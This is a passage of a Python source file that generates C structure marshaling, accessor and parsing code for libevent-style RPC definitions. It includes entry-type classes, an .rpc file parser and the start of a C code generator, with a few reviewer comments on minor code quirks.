            self.GetTranslation(
                {"var": var_name, "varlen": var_len, "buf": buf, "tag": tag_name}
            ),
        )

    @staticmethod
    def CodeMarshal(buf, tag_name, var_name, var_len):
        code = ["evtag_marshal(%s, %s, %s, %s);" % (buf, tag_name, var_name, var_len)]
        return code

    def CodeClear(self, structname):
        code = [
            "%s->%s_set = 0;" % (structname, self.Name()),
            "memset(%s->%s_data, 0, sizeof(%s->%s_data));"
            % (structname, self._name, structname, self._name),
        ]

        return code

    def CodeInitialize(self, name):
        code = [
            "memset(%s->%s_data, 0, sizeof(%s->%s_data));"
            % (name, self._name, name, self._name)
        ]
        return code

    def Verify(self):
        """A byte entry additionally requires a declared length."""
        if not self._length:
            raise RpcGenError(
                'Entry "%s" needs a length '
                "around line %d" % (self._name, self.LineCount())
            )

        super(EntryBytes, self).Verify()
class EntryInt(Entry):
    """Unsigned integer entry, either 32-bit or 64-bit."""

    def __init__(self, ent_type, name, tag, bits=32):
        # Init base class
        super(EntryInt, self).__init__(ent_type, name, tag)

        self._can_be_array = True
        # NOTE(review): a *bits* value other than 32/64 leaves
        # _marshal_type unset; presumably callers only pass 32 or 64 —
        # confirm against the parser.
        if bits == 32:
            self._ctype = "ev_uint32_t"
            self._marshal_type = "int"
        if bits == 64:
            self._ctype = "ev_uint64_t"
            self._marshal_type = "int64"

    @staticmethod
    def GetInitializer():
        return "0"

    @staticmethod
    def CodeArrayFree(_var):
        # Plain integers own no heap memory.
        return []

    @staticmethod
    def CodeArrayAssign(varname, srcvar):
        return ["%(varname)s = %(srcvar)s;" % {"varname": varname, "srcvar": srcvar}]

    @staticmethod
    def CodeArrayAdd(varname, value):
        """Returns a new entry of this type."""
        return ["%(varname)s = %(value)s;" % {"varname": varname, "value": value}]

    def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
        code = [
            "if (evtag_unmarshal_%(ma)s(%(buf)s, %(tag)s, &%(var)s) == -1) {",
            '  event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
            "  return (-1);",
            "}",
        ]
        code = "\n".join(code) % self.GetTranslation(
            {"ma": self._marshal_type, "buf": buf, "tag": tag_name, "var": var_name}
        )
        return code.split("\n")

    def CodeMarshal(self, buf, tag_name, var_name, _var_len):
        code = [
            "evtag_marshal_%s(%s, %s, %s);"
            % (self._marshal_type, buf, tag_name, var_name)
        ]
        return code

    def Declaration(self):
        dcl = ["%s %s_data;" % (self._ctype, self._name)]

        return dcl

    def CodeInitialize(self, name):
        code = ["%s->%s_data = 0;" % (name, self._name)]
        return code
class EntryString(Entry):
    """NUL-terminated string entry (C type char *), heap-allocated."""

    def __init__(self, ent_type, name, tag):
        # Init base class
        super(EntryString, self).__init__(ent_type, name, tag)

        self._can_be_array = True
        self._ctype = "char *"

    @staticmethod
    def GetInitializer():
        return "NULL"

    @staticmethod
    def CodeArrayFree(varname):
        code = ["if (%(var)s != NULL) free(%(var)s);"]

        return TranslateList(code, {"var": varname})

    @staticmethod
    def CodeArrayAssign(varname, srcvar):
        code = [
            "if (%(var)s != NULL)",
            "  free(%(var)s);",
            "%(var)s = strdup(%(srcvar)s);",
            "if (%(var)s == NULL) {",
            '  event_warnx("%%s: strdup", __func__);',
            "  return (-1);",
            "}",
        ]

        return TranslateList(code, {"var": varname, "srcvar": srcvar})

    @staticmethod
    def CodeArrayAdd(varname, value):
        code = [
            "if (%(value)s != NULL) {",
            "  %(var)s = strdup(%(value)s);",
            "  if (%(var)s == NULL) {",
            "    goto error;",
            "  }",
            "} else {",
            "  %(var)s = NULL;",
            "}",
        ]

        return TranslateList(code, {"var": varname, "value": value})

    def GetVarLen(self, var):
        # Marshaled length is the runtime string length.
        return "strlen(%s)" % self.GetVarName(var)

    @staticmethod
    def CodeMakeInitalize(varname):
        return "%(varname)s = NULL;" % {"varname": varname}

    def CodeAssign(self):
        """C body of the setter; duplicates the incoming string."""
        code = """int
%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,
    const %(ctype)s value)
{
  if (msg->%(name)s_data != NULL)
    free(msg->%(name)s_data);
  if ((msg->%(name)s_data = strdup(value)) == NULL)
    return (-1);
  msg->%(name)s_set = 1;
  return (0);
}""" % (
            self.GetTranslation()
        )

        return code.split("\n")

    def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
        code = [
            "if (evtag_unmarshal_string(%(buf)s, %(tag)s, &%(var)s) == -1) {",
            '  event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
            "  return (-1);",
            "}",
        ]
        code = "\n".join(code) % self.GetTranslation(
            {"buf": buf, "tag": tag_name, "var": var_name}
        )
        return code.split("\n")

    @staticmethod
    def CodeMarshal(buf, tag_name, var_name, _var_len):
        code = ["evtag_marshal_string(%s, %s, %s);" % (buf, tag_name, var_name)]
        return code

    def CodeClear(self, structname):
        # Frees the owned string before resetting the _set flag.
        code = [
            "if (%s->%s_set == 1) {" % (structname, self.Name()),
            "  free(%s->%s_data);" % (structname, self.Name()),
            "  %s->%s_data = NULL;" % (structname, self.Name()),
            "  %s->%s_set = 0;" % (structname, self.Name()),
            "}",
        ]

        return code

    def CodeInitialize(self, name):
        code = ["%s->%s_data = NULL;" % (name, self._name)]
        return code

    def CodeFree(self, name):
        code = [
            "if (%s->%s_data != NULL)" % (name, self._name),
            "    free (%s->%s_data);" % (name, self._name),
        ]

        return code

    def Declaration(self):
        dcl = ["char *%s_data;" % self._name]

        return dcl
class EntryStruct(Entry):
    """Entry that embeds another generated struct by reference."""

    def __init__(self, ent_type, name, tag, refname):
        # Init base class
        super(EntryStruct, self).__init__(ent_type, name, tag)

        self._optpointer = False
        self._can_be_array = True
        self._refname = refname
        self._ctype = "struct %s*" % refname
        self._optaddarg = False

    def GetInitializer(self):
        return "NULL"

    def GetVarLen(self, _var):
        # Length is determined by the nested struct's own marshaling.
        return "-1"

    def CodeArrayAdd(self, varname, _value):
        code = [
            "%(varname)s = %(refname)s_new();",
            "if (%(varname)s == NULL)",
            "  goto error;",
        ]

        return TranslateList(code, self.GetTranslation({"varname": varname}))

    def CodeArrayFree(self, var):
        code = ["%(refname)s_free(%(var)s);" % self.GetTranslation({"var": var})]
        return code

    def CodeArrayAssign(self, var, srcvar):
        # Deep-copies *srcvar* into *var* via a marshal/unmarshal round trip.
        code = [
            "int had_error = 0;",
            "struct evbuffer *tmp = NULL;",
            "%(refname)s_clear(%(var)s);",
            "if ((tmp = evbuffer_new()) == NULL) {",
            '  event_warn("%%s: evbuffer_new()", __func__);',
            "  had_error = 1;",
            "  goto done;",
            "}",
            "%(refname)s_marshal(tmp, %(srcvar)s);",
            "if (%(refname)s_unmarshal(%(var)s, tmp) == -1) {",
            '  event_warnx("%%s: %(refname)s_unmarshal", __func__);',
            "  had_error = 1;",
            "  goto done;",
            "}",
            "done:",
            "if (tmp != NULL)",
            "  evbuffer_free(tmp);",
            "if (had_error) {",
            "  %(refname)s_clear(%(var)s);",
            "  return (-1);",
            "}",
        ]

        return TranslateList(code, self.GetTranslation({"var": var, "srcvar": srcvar}))

    def CodeGet(self):
        """C getter; lazily allocates the nested struct on first access."""
        name = self._name
        code = [
            "int",
            "%s_%s_get(struct %s *msg, %s *value)"
            % (self._struct.Name(), name, self._struct.Name(), self._ctype),
            "{",
            "  if (msg->%s_set != 1) {" % name,
            "    msg->%s_data = %s_new();" % (name, self._refname),
            "    if (msg->%s_data == NULL)" % name,
            "      return (-1);",
            "    msg->%s_set = 1;" % name,
            "  }",
            "  *value = msg->%s_data;" % name,
            "  return (0);",
            "}",
        ]
        return code

    def CodeAssign(self):
        """C setter; deep-copies *value* via marshal/unmarshal."""
        code = (
            """int
%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,
    const %(ctype)s value)
{
   struct evbuffer *tmp = NULL;
   if (msg->%(name)s_set) {
     %(refname)s_clear(msg->%(name)s_data);
     msg->%(name)s_set = 0;
   } else {
     msg->%(name)s_data = %(refname)s_new();
     if (msg->%(name)s_data == NULL) {
       event_warn("%%s: %(refname)s_new()", __func__);
       goto error;
     }
   }
   if ((tmp = evbuffer_new()) == NULL) {
     event_warn("%%s: evbuffer_new()", __func__);
     goto error;
   }
   %(refname)s_marshal(tmp, value);
   if (%(refname)s_unmarshal(msg->%(name)s_data, tmp) == -1) {
     event_warnx("%%s: %(refname)s_unmarshal", __func__);
     goto error;
   }
   msg->%(name)s_set = 1;
   evbuffer_free(tmp);
   return (0);
 error:
   if (tmp != NULL)
     evbuffer_free(tmp);
   if (msg->%(name)s_data != NULL) {
     %(refname)s_free(msg->%(name)s_data);
     msg->%(name)s_data = NULL;
   }
   return (-1);
}"""
            % self.GetTranslation()
        )
        return code.split("\n")

    def CodeComplete(self, structname, var_name):
        # Recursively verify the nested struct when it is set.
        code = [
            "if (%(structname)s->%(name)s_set && "
            "%(refname)s_complete(%(var)s) == -1)",
            "  return (-1);",
        ]

        return TranslateList(
            code, self.GetTranslation({"structname": structname, "var": var_name})
        )

    def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
        code = [
            "%(var)s = %(refname)s_new();",
            "if (%(var)s == NULL)",
            "  return (-1);",
            "if (evtag_unmarshal_%(refname)s(%(buf)s, %(tag)s, ",
            "  %(var)s) == -1) {",
            '  event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
            "  return (-1);",
            "}",
        ]
        code = "\n".join(code) % self.GetTranslation(
            {"buf": buf, "tag": tag_name, "var": var_name}
        )
        return code.split("\n")

    def CodeMarshal(self, buf, tag_name, var_name, _var_len):
        code = [
            "evtag_marshal_%s(%s, %s, %s);" % (self._refname, buf, tag_name, var_name)
        ]
        return code

    def CodeClear(self, structname):
        code = [
            "if (%s->%s_set == 1) {" % (structname, self.Name()),
            "  %s_free(%s->%s_data);" % (self._refname, structname, self.Name()),
            "  %s->%s_data = NULL;" % (structname, self.Name()),
            "  %s->%s_set = 0;" % (structname, self.Name()),
            "}",
        ]

        return code

    def CodeInitialize(self, name):
        code = ["%s->%s_data = NULL;" % (name, self._name)]
        return code

    def CodeFree(self, name):
        code = [
            "if (%s->%s_data != NULL)" % (name, self._name),
            "    %s_free(%s->%s_data);" % (self._refname, name, self._name),
        ]

        return code

    def Declaration(self):
        dcl = ["%s %s_data;" % (self._ctype, self._name)]

        return dcl
class EntryVarBytes(Entry):
    """Entry type for a variable-length ``bytes`` field.

    Generates a heap-allocated ``<name>_data`` byte pointer plus a
    ``<name>_length`` counter, together with assign/get, (un)marshal,
    clear, init and free code.
    """

    def __init__(self, ent_type, name, tag):
        # Init base class
        super(EntryVarBytes, self).__init__(ent_type, name, tag)

        # The payload is exposed to C callers as a raw byte pointer.
        self._ctype = "ev_uint8_t *"

    @staticmethod
    def GetInitializer():
        """C initializer expression for the data pointer."""
        return "NULL"

    def GetVarLen(self, var):
        """C expression giving the current payload length of this member."""
        return "%(var)s->%(name)s_length" % self.GetTranslation({"var": var})

    @staticmethod
    def CodeArrayAdd(varname, _value):
        # xxx: copy
        return ["%(varname)s = NULL;" % {"varname": varname}]

    def GetDeclaration(self, funcname):
        """Prototype of the generated getter (data + length out-params)."""
        code = [
            "int %s(struct %s *, %s *, ev_uint32_t *);"
            % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def AssignDeclaration(self, funcname):
        """Prototype of the generated setter (value + explicit length)."""
        code = [
            "int %s(struct %s *, const %s, ev_uint32_t);"
            % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def CodeAssign(self):
        """Generate the C setter: frees any old buffer, copies *len* bytes in."""
        name = self._name
        code = [
            "int",
            "%s_%s_assign(struct %s *msg, "
            "const %s value, ev_uint32_t len)"
            % (self._struct.Name(), name, self._struct.Name(), self._ctype),
            "{",
            "  if (msg->%s_data != NULL)" % name,
            "    free (msg->%s_data);" % name,
            "  msg->%s_data = malloc(len);" % name,
            "  if (msg->%s_data == NULL)" % name,
            "    return (-1);",
            "  msg->%s_set = 1;" % name,
            "  msg->%s_length = len;" % name,
            "  memcpy(msg->%s_data, value, len);" % name,
            "  return (0);",
            "}",
        ]
        return code

    def CodeGet(self):
        """Generate the C getter: exposes the internal buffer and its length."""
        name = self._name
        code = [
            "int",
            "%s_%s_get(struct %s *msg, %s *value, ev_uint32_t *plen)"
            % (self._struct.Name(), name, self._struct.Name(), self._ctype),
            "{",
            "  if (msg->%s_set != 1)" % name,
            "    return (-1);",
            "  *value = msg->%s_data;" % name,
            "  *plen = msg->%s_length;" % name,
            "  return (0);",
            "}",
        ]
        return code

    def CodeUnmarshal(self, buf, tag_name, var_name, var_len):
        """Generate C unmarshaling code with a length sanity check."""
        code = [
            "if (evtag_payload_length(%(buf)s, &%(varlen)s) == -1)",
            "  return (-1);",
            # We do not want DoS opportunities
            "if (%(varlen)s > evbuffer_get_length(%(buf)s))",
            "  return (-1);",
            "if ((%(var)s = malloc(%(varlen)s)) == NULL)",
            "  return (-1);",
            "if (evtag_unmarshal_fixed(%(buf)s, %(tag)s, %(var)s, "
            "%(varlen)s) == -1) {",
            '  event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
            "  return (-1);",
            "}",
        ]
        code = "\n".join(code) % self.GetTranslation(
            {"buf": buf, "tag": tag_name, "var": var_name, "varlen": var_len}
        )
        return code.split("\n")

    @staticmethod
    def CodeMarshal(buf, tag_name, var_name, var_len):
        """Generate the marshaling call (explicit payload length)."""
        code = ["evtag_marshal(%s, %s, %s, %s);" % (buf, tag_name, var_name, var_len)]
        return code

    def CodeClear(self, structname):
        """Generate C code that frees the buffer and resets length/set flags."""
        code = [
            "if (%s->%s_set == 1) {" % (structname, self.Name()),
            "  free (%s->%s_data);" % (structname, self.Name()),
            "  %s->%s_data = NULL;" % (structname, self.Name()),
            "  %s->%s_length = 0;" % (structname, self.Name()),
            "  %s->%s_set = 0;" % (structname, self.Name()),
            "}",
        ]
        return code

    def CodeInitialize(self, name):
        """Generate member initialization (NULL pointer, zero length)."""
        code = [
            "%s->%s_data = NULL;" % (name, self._name),
            "%s->%s_length = 0;" % (name, self._name),
        ]
        return code

    def CodeFree(self, name):
        """Generate C code that frees the buffer if allocated."""
        code = [
            "if (%s->%s_data != NULL)" % (name, self._name),
            "  free(%s->%s_data);" % (name, self._name),
        ]
        return code

    def Declaration(self):
        """Emit the data-pointer and length member declarations."""
        dcl = [
            "ev_uint8_t *%s_data;" % self._name,
            "ev_uint32_t %s_length;" % self._name,
        ]
        return dcl
class EntryArray(Entry):
    """Wrapper entry that turns another Entry into a growable C array.

    Generates ``<name>_data`` / ``<name>_length`` / ``<name>_num_allocated``
    members plus indexed get/assign, add (with doubling growth), and the
    loop-based complete/(un)marshal/clear/free code, delegating per-element
    code generation to the wrapped entry.
    """

    # C expression used to index the wrapped entry; rebound before each
    # per-element code-generation pass (e.g. "i" inside generated loops).
    _index = None

    def __init__(self, entry):
        # Init base class
        super(EntryArray, self).__init__(entry._type, entry._name, entry._tag)

        self._entry = entry
        self._refname = entry._refname
        self._ctype = self._entry._ctype
        self._optional = True
        self._optpointer = self._entry._optpointer
        self._optaddarg = self._entry._optaddarg

        # provide a new function for accessing the variable name
        def GetVarName(var_name):
            return "%(var)s->%(name)s_data[%(index)s]" % self._entry.GetTranslation(
                {"var": var_name, "index": self._index}
            )

        # Monkey-patch the wrapped entry so its generated code indexes
        # into this array via self._index.
        self._entry.GetVarName = GetVarName

    def GetInitializer(self):
        """C initializer for the array data pointer."""
        return "NULL"

    def GetVarName(self, var):
        """The array itself is addressed by the plain variable name."""
        return var

    def GetVarLen(self, _var_name):
        """Length is handled per element; -1 signals 'not applicable'."""
        return "-1"

    def GetDeclaration(self, funcname):
        """Allows direct access to elements of the array."""
        code = [
            "int %(funcname)s(struct %(parent_name)s *, int, %(ctype)s *);"
            % self.GetTranslation({"funcname": funcname})
        ]
        return code

    def AssignDeclaration(self, funcname):
        """Prototype of the generated indexed setter."""
        code = [
            "int %s(struct %s *, int, const %s);"
            % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def AddDeclaration(self, funcname):
        """Prototype of the generated append helper."""
        code = [
            "%(ctype)s %(optpointer)s "
            "%(funcname)s(struct %(parent_name)s *msg%(optaddarg)s);"
            % self.GetTranslation({"funcname": funcname})
        ]
        return code

    def CodeGet(self):
        """Generate the bounds-checked indexed C getter."""
        code = """int
%(parent_name)s_%(name)s_get(struct %(parent_name)s *msg, int offset,
    %(ctype)s *value)
{
  if (!msg->%(name)s_set || offset < 0 || offset >= msg->%(name)s_length)
    return (-1);
  *value = msg->%(name)s_data[offset];
  return (0);
}
""" % (
            self.GetTranslation()
        )

        return code.splitlines()

    def CodeAssign(self):
        """Generate the bounds-checked indexed C setter."""
        code = [
            "int",
            "%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg, int off,",
            "    const %(ctype)s value)",
            "{",
            "  if (!msg->%(name)s_set || off < 0 || off >= msg->%(name)s_length)",
            "    return (-1);",
            "",
            "  {",
        ]
        code = TranslateList(code, self.GetTranslation())

        # Per-element assignment code comes from the wrapped entry.
        codearrayassign = self._entry.CodeArrayAssign(
            "msg->%(name)s_data[off]" % self.GetTranslation(), "value"
        )
        code += ["    " + x for x in codearrayassign]

        code += TranslateList(["  }", "  return (0);", "}"], self.GetTranslation())

        return code

    def CodeAdd(self):
        """Generate the append helper plus its capacity-doubling expander."""
        codearrayadd = self._entry.CodeArrayAdd(
            "msg->%(name)s_data[msg->%(name)s_length - 1]" % self.GetTranslation(),
            "value",
        )
        code = [
            "static int",
            "%(parent_name)s_%(name)s_expand_to_hold_more("
            "struct %(parent_name)s *msg)",
            "{",
            "  int tobe_allocated = msg->%(name)s_num_allocated;",
            "  %(ctype)s* new_data = NULL;",
            "  tobe_allocated = !tobe_allocated ? 1 : tobe_allocated << 1;",
            "  new_data = (%(ctype)s*) realloc(msg->%(name)s_data,",
            "      tobe_allocated * sizeof(%(ctype)s));",
            "  if (new_data == NULL)",
            "    return -1;",
            "  msg->%(name)s_data = new_data;",
            "  msg->%(name)s_num_allocated = tobe_allocated;",
            "  return 0;",
            "}",
            "",
            "%(ctype)s %(optpointer)s",
            "%(parent_name)s_%(name)s_add(struct %(parent_name)s *msg%(optaddarg)s)",
            "{",
            "  if (++msg->%(name)s_length >= msg->%(name)s_num_allocated) {",
            "    if (%(parent_name)s_%(name)s_expand_to_hold_more(msg)<0)",
            "      goto error;",
            "  }",
        ]
        code = TranslateList(code, self.GetTranslation())

        code += ["  " + x for x in codearrayadd]

        code += TranslateList(
            [
                "  msg->%(name)s_set = 1;",
                "  return %(optreference)s(msg->%(name)s_data["
                "msg->%(name)s_length - 1]);",
                "error:",
                "  --msg->%(name)s_length;",
                "  return (NULL);",
                "}",
            ],
            self.GetTranslation(),
        )

        return code

    def CodeComplete(self, structname, var_name):
        """Generate a per-element validation loop (empty if nothing to check)."""
        self._index = "i"
        tmp = self._entry.CodeComplete(structname, self._entry.GetVarName(var_name))
        # skip the whole loop if there is nothing to check
        if not tmp:
            return []

        translate = self.GetTranslation({"structname": structname})
        code = [
            "{",
            "  int i;",
            "  for (i = 0; i < %(structname)s->%(name)s_length; ++i) {",
        ]

        code = TranslateList(code, translate)

        code += ["    " + x for x in tmp]

        code += ["  }", "}"]

        return code

    def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
        """Generate code that grows the array and unmarshals one element."""
        translate = self.GetTranslation(
            {
                "var": var_name,
                "buf": buf,
                "tag": tag_name,
                "init": self._entry.GetInitializer(),
            }
        )
        # NOTE(review): the puts("HEY NOW") below is a debug leftover that
        # ends up in the generated C on allocation failure.
        code = [
            "if (%(var)s->%(name)s_length >= %(var)s->%(name)s_num_allocated &&",
            "    %(parent_name)s_%(name)s_expand_to_hold_more(%(var)s) < 0) {",
            '  puts("HEY NOW");',
            "  return (-1);",
            "}",
        ]

        # the unmarshal code directly returns
        code = TranslateList(code, translate)

        self._index = "%(var)s->%(name)s_length" % translate

        code += self._entry.CodeUnmarshal(
            buf,
            tag_name,
            self._entry.GetVarName(var_name),
            self._entry.GetVarLen(var_name),
        )

        code += ["++%(var)s->%(name)s_length;" % translate]

        return code

    def CodeMarshal(self, buf, tag_name, var_name, _var_len):
        """Generate a loop marshaling every element of the array."""
        code = ["{", "  int i;", "  for (i = 0; i < %(var)s->%(name)s_length; ++i) {"]

        self._index = "i"
        code += self._entry.CodeMarshal(
            buf,
            tag_name,
            self._entry.GetVarName(var_name),
            self._entry.GetVarLen(var_name),
        )
        code += ["  }", "}"]

        code = "\n".join(code) % self.GetTranslation({"var": var_name})

        return code.split("\n")

    def CodeClear(self, structname):
        """Generate code that frees each element (if needed) and the array."""
        translate = self.GetTranslation({"structname": structname})
        codearrayfree = self._entry.CodeArrayFree(
            "%(structname)s->%(name)s_data[i]"
            % self.GetTranslation({"structname": structname})
        )

        code = ["if (%(structname)s->%(name)s_set == 1) {"]

        if codearrayfree:
            code += [
                "  int i;",
                "  for (i = 0; i < %(structname)s->%(name)s_length; ++i) {",
            ]

        code = TranslateList(code, translate)

        if codearrayfree:
            code += ["    " + x for x in codearrayfree]
            code += ["  }"]

        code += TranslateList(
            [
                "  free(%(structname)s->%(name)s_data);",
                "  %(structname)s->%(name)s_data = NULL;",
                "  %(structname)s->%(name)s_set = 0;",
                "  %(structname)s->%(name)s_length = 0;",
                "  %(structname)s->%(name)s_num_allocated = 0;",
                "}",
            ],
            translate,
        )

        return code

    def CodeInitialize(self, name):
        """Generate member initialization (NULL data, zero counts)."""
        code = [
            "%s->%s_data = NULL;" % (name, self._name),
            "%s->%s_length = 0;" % (name, self._name),
            "%s->%s_num_allocated = 0;" % (name, self._name),
        ]
        return code

    def CodeFree(self, structname):
        """Generate free code: clear elements, then release the array itself."""
        code = self.CodeClear(structname)

        code += TranslateList(
            ["free(%(structname)s->%(name)s_data);"],
            self.GetTranslation({"structname": structname}),
        )

        return code

    def Declaration(self):
        """Emit the data/length/capacity member declarations."""
        dcl = [
            "%s *%s_data;" % (self._ctype, self._name),
            "int %s_length;" % self._name,
            "int %s_num_allocated;" % self._name,
        ]

        return dcl
def NormalizeLine(line):
    """Strip C++-style comments and collapse runs of whitespace to spaces."""
    without_comment = CPPCOMMENT_RE.sub("", line)
    return WHITESPACE_RE.sub(" ", without_comment.strip())
# Matches an entry name with an optional "[length]" suffix, e.g. "payload[24]".
ENTRY_NAME_RE = re.compile(r"(?P<name>[^\[\]]+)(\[(?P<fixed_length>.*)\])?")
# Matches a decimal or hexadecimal tag number ("0x" prefix, case-insensitive).
ENTRY_TAG_NUMBER_RE = re.compile(r"(0x)?\d+", re.I)
def ProcessOneEntry(factory, newstruct, entry):
    """Parse one ``[optional] [array] type name = tag`` entry string.

    Creates the matching Entry object via *factory*, attaches it to
    *newstruct*, and raises RpcGenError on any malformed token.  Returns a
    list of additional structs created while processing (currently always
    empty; kept for API symmetry with ProcessStruct).
    """
    optional = False
    array = False
    entry_type = ""
    name = ""
    tag = ""
    tag_set = None
    separator = ""
    fixed_length = ""

    # Token-by-token state machine: modifiers, then type, name, "=", tag.
    for token in entry.split(" "):
        if not entry_type:
            if not optional and token == "optional":
                optional = True
                continue

            if not array and token == "array":
                array = True
                continue

        if not entry_type:
            entry_type = token
            continue

        if not name:
            res = ENTRY_NAME_RE.match(token)
            if not res:
                raise RpcGenError(
                    r"""Cannot parse name: "%s" around line %d""" % (entry, LINE_COUNT)
                )
            name = res.group("name")
            fixed_length = res.group("fixed_length")
            continue

        if not separator:
            separator = token
            if separator != "=":
                raise RpcGenError(
                    r'''Expected "=" after name "%s" got "%s"''' % (name, token)
                )
            continue

        if not tag_set:
            tag_set = 1
            if not ENTRY_TAG_NUMBER_RE.match(token):
                raise RpcGenError(r'''Expected tag number: "%s"''' % (entry))
            # base 0 accepts both decimal and 0x-prefixed hex tags
            tag = int(token, 0)
            continue

        raise RpcGenError(r'''Cannot parse "%s"''' % (entry))

    if not tag_set:
        raise RpcGenError(r'''Need tag number: "%s"''' % (entry))

    # Create the right entry
    if entry_type == "bytes":
        if fixed_length:
            newentry = factory.EntryBytes(entry_type, name, tag, fixed_length)
        else:
            newentry = factory.EntryVarBytes(entry_type, name, tag)
    elif entry_type == "int" and not fixed_length:
        newentry = factory.EntryInt(entry_type, name, tag)
    elif entry_type == "int64" and not fixed_length:
        newentry = factory.EntryInt(entry_type, name, tag, bits=64)
    elif entry_type == "string" and not fixed_length:
        newentry = factory.EntryString(entry_type, name, tag)
    else:
        res = STRUCT_REF_RE.match(entry_type)
        if res:
            # References another struct defined in our file
            newentry = factory.EntryStruct(entry_type, name, tag, res.group("name"))
        else:
            raise RpcGenError('Bad type: "%s" in "%s"' % (entry_type, entry))

    structs = []

    if optional:
        newentry.MakeOptional()
    if array:
        newentry.MakeArray()

    newentry.SetStruct(newstruct)
    newentry.SetLineCount(LINE_COUNT)
    newentry.Verify()

    if array:
        # We need to encapsulate this entry into a struct
        newentry = factory.EntryArray(newentry)
        newentry.SetStruct(newstruct)
        newentry.SetLineCount(LINE_COUNT)
        newentry.MakeArray()

    newstruct.AddEntry(newentry)

    return structs
def ProcessStruct(factory, data):
    """Parse one normalized ``struct name { ... }`` blob into Struct objects."""
    words = data.split(" ")

    # Tokens are: 'struct' <name> '{' ...entries... '}'
    newstruct = factory.Struct(words[1])
    body = " ".join(words[3:-1])

    structs = []
    for raw_entry in body.split(";"):
        entry = NormalizeLine(raw_entry)
        if not entry:
            continue

        # Entry processing may itself introduce new structs.
        structs.extend(ProcessOneEntry(factory, newstruct, entry))

    structs.append(newstruct)
    return structs
# C block-comment delimiters and the regexes used to strip them while
# scanning the .rpc input (single-line, open-to-EOL, close-to-EOL, and
# fully-contained multiline variants).
C_COMMENT_START = "/*"
C_COMMENT_END = "*/"
C_COMMENT_START_RE = re.compile(re.escape(C_COMMENT_START))
C_COMMENT_END_RE = re.compile(re.escape(C_COMMENT_END))
C_COMMENT_START_SUB_RE = re.compile(r"%s.*$" % (re.escape(C_COMMENT_START)))
C_COMMENT_END_SUB_RE = re.compile(r"%s.*$" % (re.escape(C_COMMENT_END)))
C_MULTILINE_COMMENT_SUB_RE = re.compile(
    r"%s.*?%s" % (re.escape(C_COMMENT_START), re.escape(C_COMMENT_END))
)
# Preprocessor lines passed straight through to the generated C file.
CPP_CONDITIONAL_BLOCK_RE = re.compile(r"#(if( |def)|endif)")
INCLUDE_RE = re.compile(r'#include (".+"|<.+>)')
def GetNextStruct(filep):
    """Read *filep* until one complete struct definition has been collected.

    Strips C comments, records #include / #if / #define lines into the
    CPP_DIRECT / HEADER_DIRECT pass-through lists, and returns the struct
    body flattened onto a single normalized line ("" at EOF).  Raises
    RpcGenError on stray input.  Updates the global LINE_COUNT.
    """
    global CPP_DIRECT
    global LINE_COUNT

    got_struct = False
    have_c_comment = False
    data = ""

    while True:
        line = filep.readline()
        if not line:
            break

        LINE_COUNT += 1
        line = line[:-1]

        # Strip C block comments; a comment that opens here but does not
        # close sets have_c_comment so following lines are skipped.
        if not have_c_comment and C_COMMENT_START_RE.search(line):
            if C_MULTILINE_COMMENT_SUB_RE.search(line):
                line = C_MULTILINE_COMMENT_SUB_RE.sub("", line)
            else:
                line = C_COMMENT_START_SUB_RE.sub("", line)
                have_c_comment = True

        if have_c_comment:
            if not C_COMMENT_END_RE.search(line):
                continue
            have_c_comment = False
            line = C_COMMENT_END_SUB_RE.sub("", line)

        line = NormalizeLine(line)

        if not line:
            continue

        if not got_struct:
            # Outside a struct: only preprocessor directives or a new
            # struct header are legal.
            if INCLUDE_RE.match(line):
                CPP_DIRECT.append(line)
            elif CPP_CONDITIONAL_BLOCK_RE.match(line):
                CPP_DIRECT.append(line)
            elif PREPROCESSOR_DEF_RE.match(line):
                HEADER_DIRECT.append(line)
            elif not STRUCT_DEF_RE.match(line):
                raise RpcGenError("Missing struct on line %d: %s" % (LINE_COUNT, line))
            else:
                got_struct = True
                data += line
            continue

        # We are inside the struct
        tokens = line.split("}")
        if len(tokens) == 1:
            data += " " + line
            continue

        if tokens[1]:
            raise RpcGenError("Trailing garbage after struct on line %d" % LINE_COUNT)

        # We found the end of the struct
        data += " %s}" % tokens[0]
        break

    # Remove any comments, that might be in there
    data = re.sub(r"/\*.*\*/", "", data)

    return data
def Parse(factory, filep):
    """Parse *filep* and return the list of struct entities it defines."""
    entities = []

    # Consume one normalized struct definition at a time until EOF.
    while True:
        definition = GetNextStruct(filep)
        if not definition:
            break
        entities.extend(ProcessStruct(factory, definition))

    return entities
class CCodeGenerator(object):
    """Factory + file-level boilerplate for generating C output.

    Supplies the header/body preambles and postambles, maps the input
    filename to .h/.gen.c output names, and constructs the concrete
    Struct/Entry objects used by the parser.
    """

    def __init__(self):
        pass

    @staticmethod
    def GuardName(name):
        # Use the complete provided path to the input file, with all
        # non-identifier characters replaced with underscores, to
        # reduce the chance of a collision between guard macros.
        return "EVENT_RPCOUT_%s_" % (NONIDENT_RE.sub("_", name).upper())

    def HeaderPreamble(self, name):
        """Return the generated header's include guard + fixed includes."""
        guard = self.GuardName(name)
        pre = """
/*
 * Automatically generated from %s
 */

#ifndef %s
#define %s

""" % (
            name,
            guard,
            guard,
        )

        if HEADER_DIRECT:
            for statement in HEADER_DIRECT:
                pre += "%s\n" % statement
            pre += "\n"

        pre += """
#include <event2/util.h> /* for ev_uint*_t */
#include <event2/rpc.h>
"""

        return pre

    def HeaderPostamble(self, name):
        """Return the closing #endif for the include guard."""
        guard = self.GuardName(name)
        return "#endif  /* %s */" % (guard)

    @staticmethod
    def BodyPreamble(name, header_file):
        """Return the generated .c file's fixed includes and __func__ shim."""
        global _NAME
        global _VERSION

        # Only the basename of the header is #included.
        slash = header_file.rfind("/")
        if slash != -1:
            header_file = header_file[slash + 1 :]

        pre = """
/*
 * Automatically generated from %(name)s
 * by %(script_name)s/%(script_version)s.  DO NOT EDIT THIS FILE.
